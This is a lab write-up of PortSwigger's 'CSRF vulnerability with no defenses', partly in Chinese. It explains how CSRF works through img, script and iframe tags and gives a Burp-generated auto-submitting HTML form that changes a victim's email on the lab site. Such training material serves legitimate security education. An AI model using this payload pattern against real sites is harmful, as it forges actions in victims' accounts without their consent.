CSRF - APPRENTICE
tags: Portswigger Web Security Academy Web
[TOC]
Lab: CSRF vulnerability with no defenses
- Description: This lab’s email change functionality is vulnerable to CSRF.
- Goal: To solve the lab, craft some HTML that uses a CSRF attack to change the viewer’s email address and upload it to your exploit server.
You can log in to your own account using the following credentials:
wiener:peter - Hint: You cannot register an email address that is already taken by another user. If you change your own email address while testing your exploit, make sure you use a different email address for the final exploit you deliver to the victim.
Background
:::spoiler CSRF 攻擊原理 [Day25]- 新手的Web系列CSRF
- 使用者登入網站
- 使用者透過身份驗證在本機形成cookie
- 使用者點擊含有惡意程式的連結,或是直接連結了第三方網站,並瀏覽了帶有以下html程式碼的網頁:
<img src=http://www.***.com/transfer.php?id=5&money=22>- 惡意程式碼利用使用者的身份發請求,即執行CSRF
- 使用者的帳號少錢錢勒QQ
常見的CSRF方法
- HTML標籤
<img>標籤屬性
<img src="惡意連結">以GET方式請求第三方網站,瀏覽器會帶上使用者的cookie發出GET請求
<script>標籤屬性
`<script src="惡意連結">`<iframe>標籤屬性
`<iframe src="惡意連結">`:::
Recon
- According to the description
It said the email change function has some CSRF exploitation. So, maybe I can login by username and password they provided.
-
Find where has CSRF Then I tried to change my email and trace the package
- Then we can forge a website and let our victim to access In this lab, PortSwigger provided an exploited server that can simulate a victim to access.
Exp
Directly create CSRF PoC by Burp Suit
Exploit Payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0a050071049c31f4815898e900330005.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="danger@gmail.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
:::spoiler Success Screenshot
:::
Reference
Burp Suite Security Academy Writeup 从0到1完全掌握 CSRF Lab: CSRF vulnerability with no defenses - write up